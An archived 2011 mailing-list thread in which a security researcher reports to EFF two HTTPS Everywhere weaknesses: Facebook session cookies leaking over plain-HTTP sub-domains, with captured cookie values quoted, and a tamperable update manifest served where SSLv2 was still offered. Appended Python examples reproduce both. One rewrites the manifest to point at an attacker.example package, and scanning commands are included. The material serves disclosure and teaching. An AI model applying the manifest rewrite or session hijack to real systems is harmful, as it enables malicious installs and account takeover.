[HTTPS-Everywhere] Fwd: URGENT! BROKEN SSL MitM Vulnerability for HTTPS Everywhere --- RE: HTTPS Everywhere doesn't cover all Facebook sub domains

Rebecca S. Reagan rsreagan at eff.org
Fri May 6 09:05:00 PDT 2011



Rebecca S. Reagan
Intake Coordinator
Electronic Frontier Foundation
(415)436-9333 Ext. 135
Become a Member! https://www.eff.org/support


-------- Original Message --------
Subject: 	URGENT! BROKEN SSL MitM Vulnerability for HTTPS Everywhere ---
RE: HTTPS Everywhere doesn't cover all Facebook sub domains
Date: 	Fri, 6 May 2011 14:42:26 +0000
From: 	Decime, Jerry (IT Security) <jerry.decime at hp.com>
To: 	Rebecca Reagan <rsreagan at eff.org>



Rebecca,

In addition to the ongoing issues with HTTPS Everywhere not actually
providing protection when visiting Facebook, it recently performed an
update for which I was able to get into the middle and push my own code
(to my own environment) rather than the actual update code from
www.eff.org. This was possible because it made an update request here:

https://www.eff.org/files/https-everywhere-update.rdf

It was then possible to modify the code location and signature:

<RDF:Description RDF:about="rdf:#$ybGCJ1"
NS1:id="{ec8030f7-c20a-464f-9b0e-13a3a9e97384}" NS1:minVersion="3.5"
NS1:maxVersion="4.*"
NS1:updateLink="https://www.eff.org/files/https-everywhere-0.9.6.xpi"
NS1:updateHash="sha1:31f800d2b1d15e994cdea0fbf0fdd72cf50c03b5"/>

This was possible because www.eff.org is STILL
USING the non-secure SSLv2 protocol:

https://www.eff.org/files/https-everywhere-update.rdf

PLEASE! Remove SSLv2 support & get this fixed ASAP!

Thanks,

Jerry Decime

Senior Security Strategist

Hewlett-Packard

From: Rebecca Reagan [mailto:rsreagan at eff.org]
Sent: Tuesday, November 16, 2010 5:30 PM
To: Decime, Jerry (IT Security)
Subject: Re: HTTPS Everywhere doesn't cover all Facebook sub domains

Dear Jerry,

Thank you for sending us follow up information. Our technologists are
aware of the methods you're describing and are considering various ways
to address the problems.

Again, thank you,

Rebecca S. Reagan


On 11/16/10 3:35 PM, Decime, Jerry (IT Security) wrote:

Release version 0.2.2. Also note that I’ve found that third parties to
Facebook sometimes fail to protect Facebook OAuth credentials with HTTPS
so the picture starts to look a bit bleak when it comes to locking down
the entire Facebook experience. Unfortunately it really does come down
to architecting applications correctly to begin with.

BTW, it’s really easy to test this plug-in by simply having all HTTP
traffic traverse The Fiddler2 & then watch and inspect any HTTP traffic
you might see. Optionally, you can also write a Fiddler2 rule to alert
you if it finds a pre-defined chunk of text. This is helpful for
automatically finding matches on session info and OAuth tokens.

Let me know if you need additional information or help.

Thanks,

Jerry Decime
Senior Security Strategist

Hewlett-Packard

From: Rebecca Reagan [mailto:rsreagan at eff.org]
Sent: Tuesday, November 16, 2010 4:29 PM
To: Decime, Jerry (IT Security)
Subject: Re: HTTPS Everywhere doesn't cover all Facebook sub domains

Dear Jerry,

Thank you for contacting the Electronic Frontier Foundation (EFF) with
your concerns. Do you know if you are using the release version of the
software, or the more aggressive development version? That would be
helpful information for us. We are working to close the gaps and
appreciate information of this nature.

Should you be interested in more information on HTTPS Everywhere, please
see the FAQ at http://www.eff.org/https-everywhere/faq or consider
joining the HTTPS Everywhere mailing list
https://falcon.eff.org/mailman/listinfo/https-everywhere.

Again, thank you for your conscientious work and for sharing the
information with us.

Yours,

Rebecca S. Reagan
Intake Coordinator

On 11/16/10 12:43 PM, Decime, Jerry (IT Security) wrote:

Attached is an HTTP capture using “The Fiddler2” which shows that your
HTTPS Everywhere plug-in for Firefox clearly does not guard against the
capture of session keys on Facebook since it doesn’t enforce HTTPS for
all sub domains containing sensitive session information. In the capture
file please reference requests for:

http://apps.facebook.com

http://static.ak.connect.facebook.com

http://pixel.facebook.com

I confirmed that the cookies available via these sub domains include
Facebook session information which could be used to authenticate a
session as the user:

  From www.facebook.com which is over HTTPS and
protected -> Cookie:
datr=1254513682-574ca117e8bd2a567f4b89716f2001469c25bf54e2afd8912cd3d;
lu=gg7I-qcyMqBuXz_2ipSNt3bg; c_user=100000117904896; sct=1288715876;
sid=5; xs=5051d732d54e78705c9075aef52d8eaa; locale=en_US

  From apps.facebook.com which is over HTTP and not protected & confirms
the possibility of session hijack -> Cookie:
datr=1254513682-574ca117e8bd2a567f4b89716f2001469c25bf54e2afd8912cd3d;
lu=gg7I-qcyMqBuXz_2ipSNt3bg; c_user=100000117904896; sct=1288715876;
sid=5; xs=5051d732d54e78705c9075aef52d8eaa; locale=en_US

I downloaded the plug-in today, just before testing & installed it in a
browser which has never had the plug-in installed (using Firefox
3.6.12). It enforces HTTPS elsewhere on Facebook, but not all sub
domains as shown in the attached capture.

Thanks,

Jerry Decime

Senior Security Strategist

Hewlett-Packard
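The capture quoted in the message above shows the same session cookies (c_user, xs, sid and so on) being presented to https://www.facebook.com and to plain-HTTP hosts such as http://apps.facebook.com. The following is an added example, not code from this thread, from EFF or from HTTPS Everywhere, that reproduces the mechanism offline with Python's standard http.cookiejar, whose default policy applies the same Domain and Secure rules a browser does: a cookie set with Domain=.facebook.com and no Secure attribute is released to every host under facebook.com, including the ones a rewriting extension has not forced to HTTPS, while the same cookie with Secure is withheld from http:// requests. The Set-Cookie headers are constructed for the demo (the names follow the capture, the values are placeholders).

```python
import email.message
import http.cookiejar
import urllib.request


class ConstructedResponse:
    """Just enough of an HTTP response for CookieJar.extract_cookies():
    it only needs .info() to return the response headers."""

    def __init__(self, set_cookie_headers):
        self._headers = email.message.Message()
        for value in set_cookie_headers:
            self._headers["Set-Cookie"] = value  # Message keeps repeated headers

    def info(self):
        return self._headers


# Constructed Set-Cookie headers. Cookie names follow the capture in the
# thread; the values are placeholders, not real session data.
LOGIN_URL = "https://www.facebook.com/"
WITHOUT_SECURE = [
    "datr=CONSTRUCTED-datr; Domain=.facebook.com; Path=/",
    "c_user=100000000000000; Domain=.facebook.com; Path=/",
    "xs=CONSTRUCTED-xs-session-secret; Domain=.facebook.com; Path=/",
]
# Same cookies, but the two that authenticate the session carry Secure.
WITH_SECURE = [
    "datr=CONSTRUCTED-datr; Domain=.facebook.com; Path=/",
    "c_user=100000000000000; Domain=.facebook.com; Path=/; Secure",
    "xs=CONSTRUCTED-xs-session-secret; Domain=.facebook.com; Path=/; Secure",
]


def jar_after_response(url, set_cookie_headers):
    """Store the cookies as a browser would after receiving them from url.
    CookieJar's DefaultCookiePolicy enforces the domain-match and
    Secure-only-over-https rules, which is what this example relies on."""
    jar = http.cookiejar.CookieJar()
    request = urllib.request.Request(url)
    jar.extract_cookies(ConstructedResponse(set_cookie_headers), request)
    return jar


def cookie_names_sent_to(jar, url):
    """Sorted names of the cookies the jar would attach to a request for url."""
    request = urllib.request.Request(url)
    jar.add_cookie_header(request)          # sets the Cookie header, if any
    header = request.get_header("Cookie") or ""
    return sorted(pair.split("=", 1)[0] for pair in header.split("; ") if pair)


def leaked_over_http(set_cookie_headers, login_url, plaintext_url):
    """Cookie names a passive eavesdropper on plaintext_url would see."""
    if not plaintext_url.startswith("http://"):
        raise ValueError("plaintext_url must be an http:// URL")
    jar = jar_after_response(login_url, set_cookie_headers)
    return cookie_names_sent_to(jar, plaintext_url)


def has_secure_flag(set_cookie_header):
    """The server-side check: does this Set-Cookie header carry Secure?"""
    attributes = [part.strip().split("=", 1)[0].lower()
                  for part in set_cookie_header.split(";")[1:]]
    return "secure" in attributes


if __name__ == "__main__":
    for label, headers in (("no Secure flag", WITHOUT_SECURE),
                           ("Secure on session cookies", WITH_SECURE)):
        leaked = leaked_over_http(headers, LOGIN_URL, "http://apps.facebook.com/")
        print("%-26s -> sent to http://apps.facebook.com/: %s" % (label, leaked))
```

Two things follow from running it. Client-side, an extension that rewrites some facebook.com hosts to HTTPS but not all of them cannot stop the leak, because the cookie jar keys on the Domain attribute, not on which host set the cookie; every unrewritten sub-domain is an exposure of the full session. Server-side, the durable fix is the Secure attribute on the session cookies, which the jar honours in the second run (only datr is still sent), and has_secure_flag is the check to run over a site's Set-Cookie headers in a proxy capture such as the Fiddler2 one described in the thread.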




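The update manifest quoted in the first message binds the .xpi to a SHA-1 digest, but the digest travels in the same RDF document as the download link, so whoever can tamper with the fetch of https-everywhere-update.rdf in transit can substitute both and the client's hash check still passes. The following is an added example, not code from this thread, from EFF or from Mozilla, that parses a manifest of that shape with the standard library, verifies an .xpi against its updateHash, and then performs the link-plus-digest rewrite the message describes to show that the resulting manifest verifies just as well. The manifest, both .xpi byte strings and the attacker URL are constructed for the example; the namespace URIs are the standard RDF one and Mozilla's em-rdf one, which the quoted fragment binds to the prefix NS1.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Namespaces used by Firefox extension update manifests.
RDF_NS = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
EM_NS = "http://www.mozilla.org/2004/em-rdf#"
ET.register_namespace("RDF", RDF_NS)
ET.register_namespace("NS1", EM_NS)


def _em(attr):
    """Clark-notation name for an em-rdf attribute, as ElementTree keys it."""
    return "{%s}%s" % (EM_NS, attr)


# Constructed stand-ins: neither byte string is a real add-on package.
GENUINE_XPI = b"PK\x03\x04 constructed stand-in for https-everywhere-0.9.6.xpi"
ATTACKER_XPI = b"PK\x03\x04 constructed stand-in for an attacker's replacement add-on"

# Constructed manifest in the shape of the fragment quoted in the thread. The
# digest is computed here so the sample verifies against GENUINE_XPI.
SAMPLE_UPDATE_RDF = """<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="%s" xmlns:NS1="%s">
  <RDF:Description RDF:about="rdf:#$ybGCJ1"
      NS1:id="{ec8030f7-c20a-464f-9b0e-13a3a9e97384}" NS1:minVersion="3.5"
      NS1:maxVersion="4.*"
      NS1:updateLink="https://www.eff.org/files/https-everywhere-0.9.6.xpi"
      NS1:updateHash="sha1:%s"/>
</RDF:RDF>
""" % (RDF_NS, EM_NS, hashlib.sha1(GENUINE_XPI).hexdigest())


def parse_update_entries(rdf_xml):
    """Collect every Description that carries an updateLink/updateHash pair."""
    root = ET.fromstring(rdf_xml)
    entries = []
    for desc in root.iter("{%s}Description" % RDF_NS):
        link, digest = desc.get(_em("updateLink")), desc.get(_em("updateHash"))
        if link and digest:
            entries.append({
                "app_id": desc.get(_em("id")),
                "minVersion": desc.get(_em("minVersion")),
                "maxVersion": desc.get(_em("maxVersion")),
                "updateLink": link,
                "updateHash": digest,
            })
    return entries


def verify_update_hash(xpi_bytes, update_hash):
    """Check downloaded bytes against an 'algorithm:hexdigest' updateHash."""
    algo, sep, expected = update_hash.partition(":")
    algo = algo.lower()
    if not sep or algo not in hashlib.algorithms_guaranteed:
        raise ValueError("unsupported updateHash %r" % update_hash)
    actual = hashlib.new(algo, xpi_bytes).hexdigest()
    return hmac.compare_digest(actual, expected.lower())


def mitm_rewrite(rdf_xml, replacement_xpi, replacement_url):
    """The rewrite described in the thread: an attacker who controls the
    manifest in transit points updateLink at their own package and replaces
    updateHash with that package's digest, using the same algorithm."""
    root = ET.fromstring(rdf_xml)
    for desc in root.iter("{%s}Description" % RDF_NS):
        digest = desc.get(_em("updateHash"))
        if desc.get(_em("updateLink")) is None or digest is None:
            continue
        algo = digest.partition(":")[0].lower()
        desc.set(_em("updateLink"), replacement_url)
        desc.set(_em("updateHash"),
                 "%s:%s" % (algo, hashlib.new(algo, replacement_xpi).hexdigest()))
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    original = parse_update_entries(SAMPLE_UPDATE_RDF)[0]
    print("genuine xpi, original manifest  :", verify_update_hash(GENUINE_XPI, original["updateHash"]))
    print("attacker xpi, original manifest :", verify_update_hash(ATTACKER_XPI, original["updateHash"]))
    tampered = parse_update_entries(
        mitm_rewrite(SAMPLE_UPDATE_RDF, ATTACKER_XPI, "https://attacker.example/evil.xpi"))[0]
    print("attacker xpi, tampered manifest :", verify_update_hash(ATTACKER_XPI, tampered["updateHash"]))
```

The third line of output is the point: the updateHash only binds the package to the manifest, it does not authenticate the manifest, so the transport that delivers update.rdf is the whole trust anchor. Firefox 3.x accepted an unsigned update manifest only when it was fetched over HTTPS (a plain-HTTP manifest had to carry an em:signature matching the add-on's em:updateKey), which is why the server's TLS configuration mattered here. Two caveats a practitioner would add: a server that still offers SSLv2 is a hardening failure in its own right, but an active downgrade also needs a client willing to speak SSLv2, and Firefox has shipped with it disabled by default since version 2; and to check a host for the problem, `openssl s_client -ssl2 -connect www.eff.org:443` works only with an OpenSSL build that still includes SSLv2 (it was removed in 1.1.0), whereas `nmap --script ssl-enum-ciphers -p 443 www.eff.org` lists any SSLv2 ciphers the server is willing to negotiate.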